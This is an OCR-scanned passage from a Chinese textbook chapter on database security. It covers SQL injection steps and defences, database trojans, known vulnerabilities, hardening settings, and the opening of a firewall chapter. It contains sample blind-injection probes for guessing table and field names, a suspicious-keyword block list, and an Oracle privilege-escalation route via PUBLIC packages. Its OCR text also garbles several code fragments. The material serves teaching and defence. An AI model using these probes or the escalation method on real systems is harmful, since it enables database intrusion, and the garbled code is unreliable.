and 1 过 (select count( x* ) from admin) ,通过 出 错 点 判断 数目 。 

(3) 猜 解 字段 名 称 。 在 len() 括号 里 面 加 上 猜测 的 字段 名 称 ,输入 and 1= (select 
count( * ) from admin where len( * )>0) ,and 1= (select count( * ) from admin where len 
(用 户 字 段 名 称 name) 二 0) .and 1 二 (select count(* ) from admin where len( 密 码 字 段 名 称 
password)>0)。 

上 述 SQL 注入 攻击 实例 蕴含 着 特定 的 攻击 步骤 和 攻击 模式 ,它们 是 新 型 SQL 注入 攻 
击 的 基础 。 

4) 二 阶 SQL 注入 

所 谓 二 阶 SQL 注入 是 数据 库 系统 可 以 成 功 转 义 带 有 单 引 号 的 数据 并 将 它 保存 在 数据 
库 中 ,但 是 ,重新 使 用 这 些 数据 时 会 在 数据 库 内 部 自动 形成 具有 SQL 注入 攻击 效果 的 语句 。 
因此 二 阶 SQL 注入 攻击 不 直接 进行 攻击 ,但 可 以 借助 其 他 合法 功能 实现 攻击 。 

2. SOL 注入 防范 技术 

SQL 注入 攻击 的 常规 防范 技术 可 以 分 为 4 类 : 修补 应 用 程序 漏洞 .输入 验证 来 过 滤 
SQL 命令 .SQL 注入 攻击 在 线 监控 ,发 现 并 修补 数据 库 SQL 注入 漏洞 。 

1) 修补 应 用 程序 漏洞 

修补 应 用 程序 漏洞 一 般 由 程序 开发 者 自行 负责 ,最 好 和 DBA 一 同 进 行 ,目标 是 减少 
SQL 注入 攻击 漏洞 。 

措施 是 : 清洗 用 户 输入 数据 ,验证 所 有 输入 字段 ;禁止 字符 串 拼接 产生 SQL 语句 ;对 存 
储 过 程 参数 实行 强 类 型 检查 ; 预 处 理 SQL 语句 ,采用 参数 集合 ,参数 化 的 存储 过 程 ; 登 录 使 
用 存储 过 程 实现 ;为 用 户 输入 添加 引号 ,包括 数据 。 

预 处 理 的 SQL 语句 与 字符 拼接 不 同 , 不 会 混淆 SQL 语句 元 素 与 参数 ,可 以 获得 确切 无 
误 的 SQL 语句 ,是 防范 SQL 注入 攻击 的 简单 方法 。 

参数 集合 通过 内 部 对 象 如 SqlParameter 保持 输入 参数 的 原 义 ,避免 将 参数 直接 附加 在 
SQL 语句 中 。 通 过 模块 隔离 避免 代码 以 管理 员 身 份 登录 和 合法 使 用 所 有 存储 过 程 。 总 的 
设计 思想 是 每 个 SQL 语句 具有 最 小 特权 。 

2) 输入 验证 

输入 验证 分 为 三 种 类 型 ,分别 是 数据 清洗 .拒绝 可 疑 输入 和 接收 可 信和 输入 ,一般 结 合 使 用 。 

数据 清洗 需要 定义 “ 坏 数据 ”, 一 种 典型 方式 是 将 单 引号 转 义 为 双 引 号 。 

拒绝 可 疑 输 入 先 定 义 可 疑 关 键 字 : know_bad 二 array ("select","insert","update"， 
"delete","drop","--",""), 但 可 疑 输入 的 内 容 和 形式 千变万化 。 

3) SQL 注入 攻击 在 线 监控 

SQL 注入 攻击 需要 一 个 过 程 ,基本 步骤 是 判断 环境 特征 ,寻找 注入 点 ,识别 数据 库 类 
型 ,获取 数据 库 表 名 /字段 个 数 ,字段 名 称 /参数 类 型 ,构造 攻击 语句 ,实施 攻击 。 攻 击 是 一 系 
列 尝试 过 程 ,产生 一 系列 异常 ,可 以 在 线 监控 防范 SQL 注入 。SQL 注入 在 线 监控 有 三 个 主 
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要 线索 ,分别 是 攻击 特征 .异常 和 基线 偏离 程度 。 

攻击 特征 (Attack Signature) 主要 是 发 现 和 识别 攻击 模式 。 每 一 种 SQL 注入 攻击 都 对 
应 着 一 种 攻击 模式 ,分 为 等 价 恒 真 等 式 .注释 . 转 义 字符 和 二 阶 注入 等 , 需 采 用 形式 化 的 谓词 
来 描述 攻击 模式 。 监 控 攻 击 特征 有 可 能 产生 误 报 ,有 时 影响 数据 库 应 用 系统 的 可 用 性 。 

SQL 异常 包括 SELECT 字段 数目 异常 .引号 不 完整 异常 .数据 转换 异常 .数据 与 字段 
类 型 不 匹配 异常 等 。 开 发 人 员 应 屏蔽 或 修改 数据 库 异常 返回 信息 。 

根据 基线 偏离 程度 (Divergence From a Baseline) 发 现 识别 SQL 注入 攻击 需要 监控 应 
用 程序 的 正常 全 部 运行 过 程 ,然后 分 类 当前 行为 与 “好 行为 ”的 偏离 程度 ,判断 攻击 的 可 能 性 。 

4) 锁定 数据 库 服 务 器 

虽然 SQL 注入 攻击 主要 是 利用 应 用 程序 中 的 安全 漏洞 ,但 是 ,不 同 的 DBMS 产品 和 不 
同 配置 都 会 影响 SQL 注入 攻击 。 

锁定 数据 库 服务 器 ,避免 为 SQL 注入 提供 漏洞 的 主要 措施 是 : 有 效 验 证 DBMS 的 网 络 
连接 ;有 效 验证 账户 ,审计 口令 使 用 情况 ;有 效 验证 存在 的 客体 ,清除 一 些 不 必要 的 扩展 存储 
过 程 ,删除 与 之 关联 的 dll 文件 ,清除 所 有 数据 库 示 例 ; 有 效 验证 主体 对 客体 的 访问 权限 , 保 
证 账户 具有 最 小 特权 ,只 能 访问 必须 访问 的 客体 ;及 时 升级 服务 器 ,安装 最 新 的 补丁 ;有 效 记 
录 日 志 , 检 查处 理 日 志 记录 。 


9.$.3 数据 库 木马 防范 


数据 库 木 马 由 恶意 代码 的 注入 和 调用 构成 。 数 据 库 木 马 的 特点 是 难于 跟踪 ,很 难 理解 
两 个 不 同时 间 ,不 同 连接 ,甚至 不 同 用 户 的 事件 如 何 组 合成 一 个 攻击 。 

根据 注入 和 调用 事件 之 间 关 系 ,数据 库 木 马 先 注 入 后 调用 、 租 入 正常 的 SQL 语句 或 存 
储 过 程 隐蔽 调用 。 典 型 实例 是 通过 SQL 语句 开启 执行 dos 命令 的 Shell 通道 。 攻 击 的 解 
决 方案 是 监控 存储 过 程 的 执行 .创建 、 修 改 。 

1. 存储 过 程 基线 调用 与 偏离 的 处 理 

基线 列举 了 执行 模式 ,包括 执行 存储 过 程 的 数据 库 用 户 、 程 序 源 、 网 络 节点 和 操作 内 容 
等 信息 。 定 义 基 线 及 其 偏离 需要 区 分 存储 过 程 和 用 户 的 类 型 ,将 存储 过 程 划分 为 应 用 类 和 
系统 类 ,允许 DBA 调用 系统 类 内 建 存储 过 程 ,其 他 用 户 调用 应 用 类 存储 过 程 。 

监控 储存 过 程 执行 的 关键 是 在 保证 大 量 存储 过 程 转 移 的 同时 ,识别 不 正常 情况 。 如 果 
攻击 者 按部就班 ,没有 任何 偏离 基线 的 行为 ,一 般 难 于 植 人 木马 进行 调用 。 

如 果 发 生 基线 偏离 ,可 以 采取 三 种 措施 进行 处 理 。 首 先 记 录 详 细 日 志 , 以 便 管理 人 员 评 
估 偏 离 行 为 的 目的 和 可 疑 程度 。 其 次 ,系统 提供 实时 警告 ,但 增加 数据 库 的 安全 敏感 程度 。 
最 后 阻止 偏离 基线 的 调用 ,形成 SQL 基线 防火 墙 。 

2. 监控 存储 过 程 创建 及 修改 

监控 存储 过 程 、 触 发 器 的 创建 及 修改 ,可 以 有 效 阻 止 木马 的 植 入 。 如 监控 CREATE 
PROCEDURE 和 ALTER TRIGGER 命令 的 使 用 。 如 果 怀 疑 隐藏 着 木马 植 入 的 可 能 ,可 以 
采取 记录 详细 日 志 、 提 供 实时 警告 和 通过 SQL 防火 墙 阻止 三 种 措施 进行 处 理 。 

3. 监控 权限 的 改变 

利用 正常 程序 调用 或 者 盗用 用 户 的 权限 来 启动 木马 ,调用 者 无 意 之 中 代表 了 攻击 者 的 
角色 。 因 此 系统 需要 严密 监控 权限 的 改变 。 例 如 ORACLE 允许 用 户 在 运行 过 程 中 通过 
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DBMS_ SYS_SQLPARSE_AS_USER 切换 身份 和 权限 。 

4. 监控 系统 开发 活动 

监控 和 审计 数据 库 系 统 可 以 在 不 同 粒度 展开 。 例 如 ,可 以 审计 每 个 应 用 中 改变 数据 库 
模式 的 DDL 操作 、 权 限 的 授予 与 撤销 、 访 问 特定 网 络 节点 。 

审计 过 程 定义 审计 条 件 、 审 计 事件 和 审计 数据 。 审 计 开 发 活动 ,需要 完整 记录 ,采用 单 
独 的 账户 审计 ,所 有 代码 和 环境 变量 的 修改 内 容 都 有 案 可 查 。 

5. 监控 跟踪 和 事件 监控 器 的 创建 

DBMS 可 以 创建 各 种 跟踪 监控 器 和 事件 监控 器 ,用 于 数据 库 审 计 或 应 用 程序 的 使 用 ， 
或 者 被 攻击 者 用 来 实施 不 可 预计 的 活动 ,如 植 和 人 间谍 式 木 马 代码 。 

例如 在 DB2 中 ,攻击 者 可 以 利用 事件 监控 器 搜集 用 户 的 登录 活动 ;Oracle 的 事件 监控 
机 制 允 许 攻击 者 设 定 事件 ,采用 SET EVENT 植 人 木马 。 

例如 ,启动 12 级 别 的 事件 跟踪 需要 的 执行 命令 为 ALTER SESSION SET EVENTS 
10046 TRACE NAME CONTEXT FOREVER, LEVEL 12', 

也 可 以 使 用 SET_EV 函数 : DBMS_SYSTEM. SET_EV(<sid>, 达 serial# 二 ， 
<event> , (level> ,<name> )。 

为 了 在 Sybase 中 获取 这 些 信 息 ,攻击 者 要 求 安装 sybsecurity, 所 有 安全 相关 信息 可 以 
从 sybsecurity. dbo. sysaudits_02 中 获得 。 

Microsoft SQL Server 跟踪 机 制 可 以 生成 登录 和 注销 等 信息 ,具有 强大 的 跟踪 功能 ,可 
以 为 攻击 者 提供 便利 。 

可 以 根据 跟踪 事件 ,利用 数据 库 系统 强大 的 审计 功能 ,实现 简单 ,性 能 稳定 的 数据 库 木 
马 防 火 墙 。 


9.5.4 数据 库 安 全 漏洞 


数据 库 漏洞 的 种 类 繁多 和 危害 性 严重 是 数据 库 系统 受到 攻击 的 主要 原因 。 数 据 库 安全 

漏洞 从 来 源 上 大 致 可 以 分 为 4 类 : 默认 安装 漏洞 人 为 使 用 上 的 漏洞 数据库 设 计 缺 陷 和 数 
据 库 产品 的 Bug。 几 种 数据 库 安 全 漏洞 统计 如 图 9. 9 所 示 。 
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1. 默认 安装 漏洞 
1) 默认 用 户 名 和 密码 
在 主流 数据 库 中 ,数据 库 安装 后 往往 存在 若干 默认 数据 库 用 户 , 并 且 默 认 密 码 都 是 公开 
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的 ,攻击 者 完全 可 以 利用 这 些 默 认 用 户 登录 数据 库 。 

例如 ,Oracle 中 有 sys、system、sysman 和 scott 等 700 多 个 默认 用 户 ;MySQL 本 机 的 
root 用 户 可 以 没有 口令 ;网 络 上 主机 名 为 build 的 root 和 用 户 可 以 没有 口令 。 

2) 默认 端口 号 

在 主流 数据 库 中 ,数据 库 安 装 后 的 默认 端口 号 是 固定 的 ,如 Oracle 是 1521,SQL Server 
是 1433,MySQL 是 3306 等 。 

3) 默认 低 安 全 级 别 设置 

数据 库 安 装 后 的 默认 设置 ,安全 级 别 一 般 都 较 低 。 如 MySQL 中 本 地 用 户 登录 和 远程 
build 主机 登录 不 校 验 用 户 名 密码 ,Oracle 中 不 强制 修改 密码 ,密码 的 复杂 度 设置 较 低 ,不 限 
定 远程 链接 范围 ,通信 为 明文 等 。 

4) 默认 启用 不 必要 的 功能 

在 数据 库 的 默认 安装 中 为 了 便于 使 用 和 学 习 , 提 供 了 过 量 的 功能 和 配置 。 如 Oracle 安 
装 后 无 用 的 示例 库 、 有 威胁 的 存储 过 程 ;MySQL 的 自 定义 函数 功能 。 

5) 典型 数据 库 泄密 案例 

2011 年 5 月 ,Korea 会 展 中 心 数据 库 被 入 侵 ,黑客 在 网 上 爆 出 其 中 大 量 的 客户 资料 数 
据 , 并 展示 数据 库 操作 过 程 。 

黑客 首先 通过 端口 扫描 技术 检测 出 该 服务 器 上 开放 着 1521 端口 (Oracle 数据 库 的 默认 
端口 ) ,然后 探 明 该 主机 便 是 数据 库 服务 器 。 接 着 利用 扫描 程序 检测 到 默认 系统 用 户 
dbsnmp 并 未 被 锁定 , 且 保 留 着 数据 库 安 装 时 的 默认 密码 。 之 后 黑客 利用 权限 提升 的 漏洞 ， 
将 dbsnmp 用 户 的 权限 提升 至 DBA ,开始 访问 数据 库 。 

2.， 人 为 使 用 漏洞 

1) 过 于 宽泛 的 权限 授予 

在 很 多 系统 维护 中 ,数据 库 管理 员 并 未 细致 地 按照 最 小 授权 原则 给 予 数 据 库 用 户 授 权 ， 
而 是 根据 最 为 方便 的 原则 给 予 了 较为 宽泛 的 授权 。 

例如 ,一 个 普通 的 数据 库 维护 人 员 被 授予 了 任意 表 的 创建 和 删除 .访问 权限 ,甚至 是 给 
予 DBA 角色 。 

2) 口令 复杂 度 不 高 

(1) 弱 口令 。 数 据 库 口 令 安全 强度 不 高 ,可 通过 暴力 破解 、 猜 想 或 枚 举 可 能 的 用 户 名 / 
密码 组 合 。 

(2) 密码 曝光 。 一 些 公众 权限 的 存储 过 程 . 表 的 调用 会 导致 密码 曝光 。 

建议 DBA 细致 地 按照 最 小 授权 原则 给 予 数据 库 用 户 授权 。 数 据 库 用 户口 令 长 度 应 大 
于 等 于 10 ,并 且 应 该 包括 字母 和 数字 ,通过 口令 检验 函数 来 检验 。 

3. 数据 库 设 计 缺 陷 

1) 明文 存储 引起 的 数据 泄密 

数据 库 的 数据 大 都 以 明文 形式 存储 在 设备 中 ,存储 设备 的 丢失 或 者 非法 使 用 者 可 以 通 
过 网 络 .操作 系统 接触 到 这 些 文件 ,通过 UE 这 样 的 文本 工具 即 可 得 到 部 分 明文 的 信息 , 通 
过 DUL/MyDUL 这 样 的 工具 能 够 完全 实现 将 数据 文件 格式 化 导出 。 将 引起 数据 泄密 
风险 。 

例如 ,国内 经 济 型 连锁 酒店 集团 7 天 酒店 ,在 2011 年 被 黑客 通过 “ 刷 库 ?直接 咨 走 整个 
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数据 库 数据 。 即 黑客 利用 企业 网 站 存在 的 漏洞 入 侵 数据 库 服 务 器 ,直接 将 整个 数据 库 文件 
复制 ,通过 DUL/MyDUL 这 种 类 似 的 工具 将 所 有 二 进 制 方式 存储 的 数据 还 原 成 格式 清晰 
的 数据 。 

2) SYSDBA .DBA 等 超级 用 户 的 存在 

以 sys 和 sa 为 代表 的 系统 管理 员 , 可 以 访问 到 数据 库 的 任何 数据 ;以 用 户 数据 分 析 人 
员 ,程序 员 、 开 发 方 维护 人 员 为 代表 的 特权 用 户 ,有 时 也 需要 访问 到 敏感 数据 ,从 而 获得 了 
权限 。 

3) 无 法 鉴别 应 用 程序 的 访问 是 否 合法 

数据 库 的 一 个 缺陷 在 于 无 法 鉴别 应 用 程序 的 合法 性 ,只 要 使 用 程序 的 用 户 名 及 口令 正 
确 。 但 在 系统 维护 或 开发 过 程 中 ,应 用 系统 后 台 的 用 户 名 和 口令 很 容易 泄露 给 第 三 方 , 造 成 
他 人 合法 访问 数据 库 。 

4. 数据 库 产 品 bug 

1) 缓冲 区 溢出 

由 于 不 严谨 的 编码 ,使 数据 库 内 核 中 存在 对 于 过 长 的 连接 串 .函数 参数 .SQL 语句 、 返 
回 数据 不 能 严谨 的 处 理 ,造成 代码 段 被 覆盖 ,产生 缓冲 区 溢出 攻击 。 

通过 覆盖 的 代码 段 ,黑客 可 以 人 侵 数据 库 服务 器 。 

例如 ,SQL Server 中 利用 缓冲 区 溢出 ,攻击 者 可 以 通过 以 下 函数 或 存储 过 程 执行 任意 
代码 RAISERROR、FORMATMESSAGE、 xp _ sprintf、sp _ Mscopyscriptfile、 sp _ 
OACreate .sp_OAMethod. sp_OAGetProperty、 sp_OASetProperty 和 sp_OADestroy。 男 
外 ,xp_peekqueue、xp_displayparamstmt 和 xp_execresultset 等 40 多 个 函数 或 扩展 存储 过 
程 也 存在 缓冲 区 溢出 。 

2) 拒绝 服务 攻击 漏洞 

数据 库 中 存在 多 种 漏洞 ,可 以 导致 服务 拒绝 访问 ,如 命名 管道 拒绝 服务 ,拒绝 登录 、RPC 
请 求 拒绝 服务 等 。 

例如 MySQL 中 Data_format() 在 处 理 用 户 提交 的 参数 时 存在 漏洞 ,畸形 的 参数 数据 会 
导致 MySQL 服务 器 崩溃 。 

3) 权限 提升 漏洞 

黑客 攻击 者 可 以 利用 数据 库 平 台 软 件 的 漏洞 将 普通 用 户 的 权限 转换 为 管理 员 权 限 。 漏 
洞 可 以 在 存储 过 程 .内置 函数 ,协议 实现 甚至 是 SQL 语句 中 找到 。 

例如 ,Oracle 中 一 系列 系统 对 象 如 PL/SQL 包 ,默认 赋 予 了 Public 角色 的 执行 权限 , 借 
助 这 些 包 执行 注入 了 grant dba to user 的 函数 或 过 程 ,或 直接 作为 参数 执行 即 可 。 有 
PUBLIC 执行 权限 的 包 共 计 30 多 个 ,例如 ctxsys. driload. validate_stmt() 将 grant 语句 作 
为 参数 即 可 完成 权限 提升 。 

在 SQL Server 中 ,通过 Job 输出 文件 覆盖 ,没有 权限 的 用 户 可 以 创建 job 并 通过 SQL 
Server 代理 的 权限 提升 执行 该 Job。 


9.5.5 数据库 的 安全 配置 管理 


在 进行 操作 系统 安全 配置 ,保证 操作 系统 处 于 安全 状态 之 后 ,对 要 使 用 的 数据 库 管理 系 
统 DBMS 和 应 用 系统 DBAS 进行 必要 的 安全 配置 ,比如 对 ASP、PHP 等 脚本 ,过 滤 一 些 类 
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似 *,; @ /” 等 敏感 字符 ,安装 最 新 补丁 ,防止 病毒 和 SQL 注入 攻击 。 要 加 强 内 部 的 安全 控 
制 和 管理 员 的 安全 培训 。 

1. 系统 登录 

更 改 数据 库 系统 的 默认 超级 账户 名 或 密码 。 更 改 账号 给 系统 开发 带 来 不 便 ,因此 一 般 
在 数据 库 应 用 系统 发 布 后 部 署 使 用 时 进行 。 

SQL Server 的 认证 模式 有 Windows 身份 认证 和 混合 身份 认证 两 种 。 最 好 删除 系统 账 
号 BUILTIN\Administrators, 不 通过 操作 系统 认证 登录 。SQL Server 数据 库 还 使 用 企业 
管理 器 管理 登录 。 

更 改 sa 账号 或 密码 ,其 他 账号 建议 密码 含有 数字 字母 组 合并 且 9 位 以 上 。 超 级 用 户 sa 
的 密码 不 能 写 于 应 用 程序 或 者 脚本 中 ,并 使 用 强壮 的 密码 。 

对 于 Oracle, 在 spfile 中 设置 REMOTE_LOGIN_PASSWORDFILE=NONE 来 禁止 
SYSDBA 用 户 从 远程 登录 ,在 sqlnet. ora 中 设置 SQLNET. AUTHENTICATION _ 
SERVICES=NONE 来 禁用 SYSDBA 角色 的 自动 登录 。 设置 用 户 登 录 失败 尝试 次 数 如 
5 次 。 

删除 或 锁定 无 关 账 号 , alter user username lock; ,drop user username cascade;。 

2. 管理 存储 过 程 

对 于 SQL Server, 有 些 系统 的 存储 过 程 能 很 容易 地 被 人 利用 起 来 提升 权限 或 进行 破 
坏 。 例 如 账号 sp_addlogin、sp_password、sp_helplogins 和 sp_droplogin 等 ,应 限制 这 类 存 
储 过 程 的 使 用 。 

扩展 存储 过 程 Xp_cmdshell 是 可 以 进入 操作 系统 的 一 个 大 后 门 。 一 般 使 用 语句 去 掉 
sp_dropextendedproc Xp_cmdshell'。 

如 果 不 需 要 请 务 载 OLE 自动 存储 过 程 ,如 Sp_OACreate、 Sp_OADestroy、 Sp_ 
OAGetErrorInfo .Sp_OAGetProperty`\Sp_OAMethod.Sp_OASetProperty 和 Sp_OAStop。 

注册 表 存 储 过 程 甚至 能 够 读 出 操作 系统 管理 员 的 密码 ,因此 去 掉 不 需要 的 注册 表 访问 
的 存储 过 程 ,如 Xp_regaddmultistring、Xp_regenumvalues、Xp_regread 和 Xp_regwrite 等 。 

检查 其 他 的 扩展 存储 过 程 ,避免 造成 对 数据 库 或 应 用 程序 的 伤害 。 

3. 数据 库 端口 保护 

不 要 让 人 随便 探测 到 DBMS 的 TCP/IP 端口 。 默 认 情 况 下 ,SQL Server 使 用 1433 端 
口 监听 ,配置 改变 该 端口 。 在 实例 属性 中 选择 TCP/IP 协议 的 属性 ,隐藏 SQL Server 实例 。 
在 IPSec 过 滤 拒 绝 掉 1434 端口 的 UDP 通信 ,可 以 尽 可 能 地 隐藏 SQL Server。 

4. 使 用 协议 加 密 网 络 传输 

SQL Server 使 用 Tabular Data Stream 协议 进行 网 络 数据 交换 ,Oracle 使 用 高 级 安全 
选 件 加 密 客户 端 与 数据 库 之 间或 中 间 件 与 数据 库 之 间 的 网 络 传输 数据 。 最 好 使 用 SSL 来 
加 密 协议 (需要 证 书 来 支持 ) 。 

5. 对 网 络 连接 进行 IP 限制 

只 有 信任 的 IP 地址 才能 通过 监听 器 访问 数据 库 。SQL Server 一 般 使 用 操作 系统 的 
IPSec 实现 IP 数据 包 的 安全 性 ,对 IP 连接 进行 限制 。 对 于 Oracle, 只 需 在 服务 器 上 的 文件 
$ ORACLE_HOME/network/admin/sqlnet. ora 中 设置 以 下 行 : 


tcp.validnode checking=yes 
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tcp.invited nodes= (ipl,ip2…) 


6. 启用 数据 库 字 典 保护 
只 有 SYSDBA 用 户 才 能 访问 数据 字典 基础 表 。Oracle 通过 设置 下 面 初始 化 参数 来 限 
制 只 有 SYSDBA 权限 的 用 户 才能 访问 数据 字典 。 


O07_DICTIONARY ACCESSIBILITY=FALSE 


本 章 小 结 


数据 ,数据 库 ,数据库 管理 系统 .数据 库 应 用 系统 和 数据 库 系 统 是 数据 管理 中 经 常 使 用 
且 密 切 相 关 的 5 个 基本 概念 。ANSI/SPARC 三 层 体系 结构 从 上 至 下 分 为 三 层 ,分 别 是 外 模 
式 、 概 念 模式 和 内 模式 。 

联机 分 析 处 理 (OLAP) 是 一 种 能 够 动态 综合 .分 析 和 合并 大 量 多 维 数据 的 技术 。 数 据 
挖掘 (DM) 是 从 大 量 的 \ 不 完全 的 \ 有 噪声 的 、 模 糊 的 、 随 机 的 数据 库 中 提取 隐 含 的 ,事先 未 
知 的 、 潜 在 的 有 用 信息 规则、 规律 和 知识 的 过 程 ,共有 7 个 步骤 。 

除开 运行 环境 安全 ,数据 库 安 全 可 以 狭义 定义 为 数据 库 管理 系统 安全 数据 库 应 用 系统 
安全 和 数据 库 的 数据 安全 ,其 中 三 者 相互 联系 紧密 。 数 据 库 系统 安全 依赖 于 两 个 层次 : 一 
层 是 DBMS 本 身 提供 的 用 户 名 /口令 字 识 别 、 视 图 、 使 用 权限 控制 .审计 等 管理 措施 ; 男 一 层 
就 是 靠 应 用 程序 设置 的 控制 管理 。 

数据 库 的 安全 需求 包括 完整 性 (逻辑 、 物 理 , 元 素 )、 可 审计 性 ,访问 控制 .用户 授 权 、 可 用 
性 以 及 数据 推理 ,多 级 安全 ,密封 限界 等 。 安 全 的 基本 原则 包括 隔离 .最 小 特权 纵深 防御 、 
输入 不 信任 , 管 卡 和 失效 保护 等 。 

数据 库 安全 威胁 包括 输入 有 效 性 、 认 证 ,授权 、 配 置 管理 ,敏感 数据 、 会 话 管理 .加 密 、 参 
数 操纵 ,异常 管理 ,审计 与 日 志 等 类 型 。 

DBMS 安全 主要 是 从 访问 控制 上 保证 数据 库 的 完整 性 、 可 用 性 和 可 审计 性 。 包 括 数 据 
库 的 访问 控制 事务 并 发 .授权 机 制 . 备 份 与 恢复 、 多 级 安全 等 。 

数据 库 的 完整 性 是 指 保护 数据 库 中 数据 的 正确 性 有 效 性 和 一 致 性 ,防止 数据 库 中 存在 
不 符合 语义 的 数据 和 错误 信息 的 输入 和 输出 ,造成 无 效 操作 。 正 确 性 是 指数 据 的 输入 值 与 
数据 表 对 应 域 的 类 型 一 样 ; 有 效 性 是 指数 据 库 中 的 理论 数值 满足 现实 应 用 中 对 该 数值 段 的 
约束 ;一 致 性 是 指 不 同 用 户 使 用 的 同一 数据 应 该 是 一 样 的 。 往 往 通过 数据 模型 如 关系 模型 

数据 库 的 安全 性 是 保护 数据 库 防 止 非法 使 用 所 造成 数据 的 泄露 .更 改 或 破坏 ,包括 数据 
库 对 象 文 件 的 安全 ,数据库 内 部 数据 的 安全 。 往 往 采 用 对 数据 隔离 ,加密 存储 和 授权 访问 
(如 账户 ,口令 和 权限 控制 等 ) 等 措施 。 

敏感 数据 就 是 指 不 希望 其 他 用 户 看 见 的 数据 。 敏 感 数据 的 泄露 类 型 形式 包括 查询 数据 
的 域 值 范围 .否定 结果 和 数据 的 存在 性 。 从 已 获得 的 数据 值 推断 更 多 的 值 称 为 推理 ,推理 通 
道 是 通过 访问 非 敏 感 信 息 或 元 数据 而 泄露 敏感 信息 的 关键 。 防 止 推 理 攻 击 的 方法 有 查询 控 
制 或 单项 值 控制 限制 推理 ,包括 关联 规则 隐藏 .多 实例 ,查询 限制 和 统计 控制 等 。 

隐私 数据 是 个 人 私 权 数据 ,发布 共 享 数据 时 应 保护 隐私 数据 。 保 护 方法 包括 查询 限制 
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和 隐匿 模型 。 
数据 库 应 用 系统 (DBAS) 安 全 与 DBA .DA ,应 用 开发 人 员 和 最 终 用 户 相关 ,包括 角色 与 
权限 管理 ,SQL 注入 攻击 防范 ,数据库 木马 防范 ,数据库 漏洞 和 安全 配置 管理 等 。 


习 题 9 


简 述 数据 库 系 统 的 组 成 及 各 部 分 的 功能 。 

什么 是 数据 库 的 安全 性 ? 与 计算 机 系统 的 安全 性 有 什么 关系 ? 

试 分 析 数 据 库 安全 的 重要 性 ,说 明 数 据 库 安全 所 面临 的 威胁 。 

简 述 数据 库 系 统 的 安全 特性 和 安全 性 原则 。 

论述 实现 数据 库 安全 性 控制 的 常用 方法 和 技术 。 

数据 库 中 采用 了 哪些 安全 技术 和 保护 措施 ? 

数据 库 的 安全 策略 有 哪些 ? 简 述 其 要 点 。 

如 何 保证 数据 库 中 数据 的 完整 性 ? 

数据 库 怎 样 进行 并 发 控制 ? 

.10 简 述 数据 库 的 备份 与 恢复 方法 。 

11 事务 处 理 日 志 在 数 据 库 中 有 何 作用 ? 

12 ”数据库 加 密 有 哪儿 种 ?画图 说 明 其 系统 的 体系 结构 。 

13 ”什么 是 敏感 数据 ?有 哪些 保护 措施 ?数据 挖掘 在 数据 库 推理 中 有 何 作 用 ? 
14 什么 是 个 人 隐私 ?有 哪些 保护 方法 ? 

15 SQL 注入 攻击 有 哪些 模式 ? 

16 什么 是 存储 过 程 调用 的 基线 ? 存储 过 程 调用 的 基线 偏离 如 何 处 理 ? 
17 数据 库 有 哪些 安全 漏洞 ? 如 何 安全 配置 ? 
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第 10 章 防火 墙 技术 
10.1 防火 墙 概述 


10.1.1 防火 墙 概念 


系统 隔离 就 是 在 内 部 系统 与 对 外 连接 通道 上 设置 阻塞 点 ,以 便 对 攻击 者 进行 监视 和 控 
制 ,有 效 地 维持 被 保护 网 络 的 边界 安全 。 它 分 为 逻辑 隔离 (主要 指 防火 墙 ) 和 物理 隔离 (主要 
指 网 闸 ) 。 

所 谓 防火 墙 是 指 设置 在 两 个 网 络 之 间 实 施 访问 控制 的 一 组 部 件 集合 ,部 署 在 关键 路 径 
上 ,是 实现 网 络 和 信息 安全 的 基础 设施 ,是 不 同 网 络 或 网 络 安全 域 之 间 信息 的 唯一 出 入 口 ， 
能 根据 企业 的 安全 策略 控制 (允许 ,拒绝 、 监 测 ) 出 入 网 络 的 信息 流 , 且 本 身 具 有 较 强 的 抗 攻 
击 能 力 。 目 的 是 要 在 内 部 和 外 部 两 个 网 络 之 间 建 立 一 个 安全 控制 点 ,通过 允许 ,拒绝 或 重新 
定向 经 过 防火 墙 的 数据 流 , 实 现 对 进 、 出 内 部 网 络 的 服务 和 访问 的 审计 和 控制 。 逻 辑 上 , 防 
火 墙 是 一 个 分 离 器 ,一 个 限制 器 ,也 是 一 个 分 析 器 ,有 效 地 监控 了 内 部 网 和 外 部 网 之 间 的 任 
何 活动 ,隔离 了 不 安全 的 活动 ,保证 了 内 部 网 络 的 安全 。 

防火 墙 可 实现 以 下 几 类 访问 控制 : 

(1) 连接 控制 。 控 制 应 用 程序 中 节点 之 间 的 连接 建立 。 

(2) 协议 控制 。 只 有 经 过 精心 选择 的 应 用 协议 才能 通过 防火 墙 。 

(3) 数据 控制 。 控 制 应 用 数据 流 的 通过 。 

防火 墙 实 现 访问 控制 的 尺度 依赖 于 它 所 能 实现 的 技术 ,安全 、 管 理 、 速 度 是 防火 墙 的 三 
大 要 素 。 从 具体 实现 上 来 看 ,防火 墙 是 一 个 独立 或 一 组 紧密 联系 的 进程 ,运行 于 路 由 器 或 服 
务 器 上 ,控制 经 过 它们 的 网 络 应 用 服务 及 传输 的 数据 。 硬 件 防火 墙 实物 如 图 10. 1 所 示 。 


党 时 
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图 10.1 防火 墙 连 线 图 


10.1.2 防火 墙 的 功能 


1. 防火 墙 的 传统 功能 
防火 墙 的 经 典 功能 是 屏蔽 非法 请 求 , 防 止 跨 权限 访问 (并 产生 安全 报警 )。 其 功能 详细 
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描述 包括 过 滤 进 、 出 网 络 的 数据 ;管理 进 、 出 网 络 的 访问 行为 ; 封 堵 某 些 禁 止 的 业务 ;记录 通 
过 防火 墙 的 信息 内 容 和 活动 ;对 网 络 攻击 进行 检测 和 报警 。 

2. 防火 墙 的 扩展 功能 

(1) 安全 集中 管理 。 网 络 安全 策略 通过 方案 配置 ,能 将 所 有 安全 软件 (如 口令 、 加 密 、 身 
份 认证 和 审计 等 ) 配 置 在 防火 墙 上 。 

(2) 监控 审计 网 络 存 取 和 访问 。 通 过 日 志 记录 所 有 经 过 防火 墙 的 访问 ,同时 提供 分 析 
网 络 统计 数据 。 对 可 疑 动作 进行 适当 的 报警 ,收集 网 络 的 使 用 和 误 用 情况 。 

(3) 防止 内 部 信息 外 泄 。 利 用 防火 墙 对 内 部 网 络 的 划分 ,实现 内 部 网 重点 网 段 的 隔离 ， 
限制 局 部 敏感 网 络 对 全 局 网 络 的 安全 影响 ,保护 内 部 网 络 隐私 。 

(4) 防火 墙 的 附加 功能 。 实 际 应 用 加 入 其 他 功能 如 NAT、VPN 和 路 由 管理 等 功能 。 
这 也 是 新 一 代 防 火 墙 的 工作 重心 所 在 。 防 火 墙 在 网 络 中 的 位 置 如 图 10. 2 所 示 。 


图 10.2 防火 墙 在 网 络 中 的 位 置 


